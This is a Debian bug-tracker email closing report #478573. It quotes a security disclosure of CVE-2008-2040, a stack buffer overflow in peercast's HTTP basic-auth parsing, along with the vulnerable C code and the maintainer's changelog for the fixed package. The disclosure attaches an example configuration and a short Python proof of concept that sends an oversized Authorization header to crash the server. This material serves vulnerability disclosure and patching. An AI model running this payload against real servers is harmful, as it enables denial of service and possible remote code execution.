Your message dated Sat, 26 Jul 2008 09:57:49 +0000 with message-id <[EMAIL PROTECTED]> and subject line Bug#478573: fixed in peercast 0.1217.toots.20060314-1etch1 has caused the Debian Bug report #478573, regarding [peercast] CVE-2008-2040 stack-based buffer overflow in HTTP::getAuthUserPass function to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 478573: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=478573 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems
--- Begin Message ---Package: peercast Severity: grave Tags: security X-Debbugs-CC: [EMAIL PROTECTED] I found a security issue in the peercast server in the HTTP::getAuthUserPass function. I already contacted the upstream author 6 days ago and didn't get an answer yet so I am publishing this now. From core/common/http.cpp: 105 void HTTP::getAuthUserPass(char *user, char *pass) 106 { 107 if (arg) 108 { 109 char *s = stristr(arg,"Basic"); 110 if (s) 111 { 112 while (*s) 113 if (*s++ == ' ') 114 break; 115 String str; 116 str.set(s,String::T_BASE64); 117 str.convertTo(String::T_ASCII); 118 s = strstr(str.cstr(),":"); 119 if (s) 120 { 121 *s = 0; 122 if (user) 123 strcpy(user,str.cstr()); 124 if (pass) 125 strcpy(pass,s+1); This function is used if authentication to the peercast server is done by basic http auth rather than by a cookie. In line 116 the base64 encoded string is copied into str. Note the set method is peercasts own implementation of set since it reimplements the String class. set looks like this: From core/common/sys.h: 38 MAX_LEN = 256 ... 62 void set(const char *p, TYPE t=T_ASCII) 63 { 64 strncpy(data,p,MAX_LEN-1); 65 data[MAX_LEN-1] = 0; 66 type = t; 67 } In line 117 the string gets decoded and in line 118 and following the part before ':' in the decoded string gets copied into user and the part after it into pass. From core/common/servhs.cpp: 558 bool Servent::handshakeAuth(HTTP &http,const char *args,bool local) 559 { 560 char user[64],pass[64]; 561 user[0] = pass[0] = 0; ... 580 while (http.nextHeader()) 581 { 582 char *arg = http.getArgStr(); 583 if (!arg) 584 continue; 585 586 switch (servMgr->authType) 587 { 588 case ServMgr::AUTH_HTTPBASIC: 589 if (http.isHeader("Authorization")) 590 http.getAuthUserPass(user,pass); 591 break; user and pass are only declared to have 64 bytes (line 558) while the buffer used for copy can store up to MAX_LEN (256) bytes (ok minus the : here). Servent::handshakeAuth calls then the getAuthUserPass function triggering a buffer overflow. It's thus possible to crash the server and execute arbitrary code if the server allows http-basic authentication. I already requested a CVE id for this. An example configuration and PoC is attached. Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted.[Server] serverPort = 7144 autoServe = Yes forceIP = isRoot = No maxBitrateOut = 0 maxRelays = 2 maxDirect = 0 maxRelaysPerChannel = 0 firewallTimeout = 30 forceNormal = No rootMsg = authType = http-basic cookiesExpire = session htmlPath = html/en minPGNUIncoming = 10 maxPGNUIncoming = 20 maxServIn = 50 chanLog = networkID = 00000000000000000000000000000000 [Broadcast] broadcastMsgInterval = 10 broadcastMsg = icyMetaInterval = 8192 broadcastID = 008145B5C0427118B595AF7D9E110000 hostUpdateInterval = 180 maxControlConnections = 3 rootHost = yp.peercast.org [Client] refreshHTML = 5 relayBroadcast = 30 minBroadcastTTL = 1 maxBroadcastTTL = 7 pushTries = 5 pushTimeout = 60 maxPushHops = 8 autoQuery = 0 queryTTL = 7 [Privacy] password = s0mep4ss maxUptime = 0 [Filter] ip = 255.255.255.255 private = Yes ban = No network = Yes direct = Yes [End] [Notify] PeerCast = Yes Broadcasters = Yes TrackInfo = Yes [End] [Server1] allowHTML = Yes allowBroadcast = Yes allowNetwork = Yes allowDirect = Yes [End] [Server2] allowHTML = No allowBroadcast = Yes allowNetwork = No allowDirect = No [End] [Debug] logDebug = No logErrors = No logNetwork = No logChannel = No pauseLog = No idleSleepTime = 10#!/usr/bin/env python import sys, socket port = 7144 buff = 'GET /http/ HTTP/1.1\n' buff+= 'Connection: close\n' buff+= 'Accept: */*\n' buff+= 'Authorization: Basic OmZ' + 'vb29'*128 + 'vbwo=' + '\r\n' if(len(sys.argv) < 2): print "ERR: please specify a hostname" sys.exit(-1) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], port)) s.send(buff); except: print "ERR: socket()" sys.exit(-1)pgpl14JkUlq3G.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---Source: peercast Source-Version: 0.1217.toots.20060314-1etch1 We believe that the bug you reported is fixed in the latest version of peercast, which is due to be installed in the Debian FTP archive: libpeercast0-dev_0.1217.toots.20060314-1etch1_amd64.deb to pool/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch1_amd64.deb libpeercast0_0.1217.toots.20060314-1etch1_amd64.deb to pool/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch1_amd64.deb peercast-handlers_0.1217.toots.20060314-1etch1_all.deb to pool/main/p/peercast/peercast-handlers_0.1217.toots.20060314-1etch1_all.deb peercast-servent_0.1217.toots.20060314-1etch1_amd64.deb to pool/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch1_amd64.deb peercast_0.1217.toots.20060314-1etch1.diff.gz to pool/main/p/peercast/peercast_0.1217.toots.20060314-1etch1.diff.gz peercast_0.1217.toots.20060314-1etch1.dsc to pool/main/p/peercast/peercast_0.1217.toots.20060314-1etch1.dsc peercast_0.1217.toots.20060314-1etch1_amd64.deb to pool/main/p/peercast/peercast_0.1217.toots.20060314-1etch1_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Romain Beauxis <[EMAIL PROTECTED]> (supplier of updated peercast package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Format: 1.7 Date: Sun, 18 May 2008 03:28:44 +0200 Source: peercast Binary: libpeercast0 peercast-handlers peercast-servent peercast libpeercast0-dev Architecture: source amd64 all Version: 0.1217.toots.20060314-1etch1 Distribution: stable-security Urgency: low Maintainer: Romain Beauxis <[EMAIL PROTECTED]> Changed-By: Romain Beauxis <[EMAIL PROTECTED]> Description: libpeercast0 - P2P audio and video streaming server libraries libpeercast0-dev - P2P audio and video streaming server -- development peercast - P2P audio and video streaming server metapackage peercast-handlers - P2P audio and video streaming handlers peercast-servent - P2P audio and video streaming servent Closes: 478573 Changes: peercast (0.1217.toots.20060314-1etch1) stable-security; urgency=low . * Fixed CVE-2008-2040: | stack-based buffer overfow in the | HTTP::getAuthUserPass function leading | to remote DoS or arbitrary code execution | if peercast is configured to use http-basic | authentication Closes: #478573 Thanks to Nico Golde <[EMAIL PROTECTED]> for reporting and fixing the issue. Files: 10e545471f649cd37409dc9cbfd7960a 1070 sound optional peercast_0.1217.toots.20060314-1etch1.dsc c7fc173230621f05137a6420a48b3347 7458 sound optional peercast_0.1217.toots.20060314-1etch1.diff.gz ac385ad05a69ba429c2e300920ff1192 6828 sound optional peercast-handlers_0.1217.toots.20060314-1etch1_all.deb 0a0bd5ef6f4c6632d3f904100474f66a 2924 sound optional peercast_0.1217.toots.20060314-1etch1_amd64.deb d42cf469c93a79a328d7e8e31bc9c90c 50774 sound optional peercast-servent_0.1217.toots.20060314-1etch1_amd64.deb 2378fddac9eea542ee891cb96d77b8d4 172136 libs optional libpeercast0_0.1217.toots.20060314-1etch1_amd64.deb 53638a13906e1599c5938d067ffe729b 323944 libdevel optional libpeercast0-dev_0.1217.toots.20060314-1etch1_amd64.deb -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBSDLETgC5aaocqV0ZAQIWmgf/Y3afdxpaURG/frqBCDTdqs5Bw2RD5GRJ VqeCaWerXVnYAODF+Ao3nWfz5mpB4kZCwKLaaymONyX/0O14Yl4y3URJTAHjZxyr ci8Vq8MGHwiOWUxLfbkBgf+eNtuXK6MN/lobPcAICusFgwz0ttDDfaqpvwF24kWM 534PxFdNbwofEMlY6XloJdf0N3X7NUwrWGx1ei4N66HH5KX4Ckycs1qdRsFqCsCo 2lcB1ew23byijfe4JlpX3ZAY1vUDBZSqDl9wEroZh5LIuih6XBnmAsy/RcEj8Do3 FgewdgSwsOfWiI9neYmM17+o01XQpSfjmlindHFPNwnK2BS5nw9JxQ== =s9DG -----END PGP SIGNATURE-----
--- End Message ---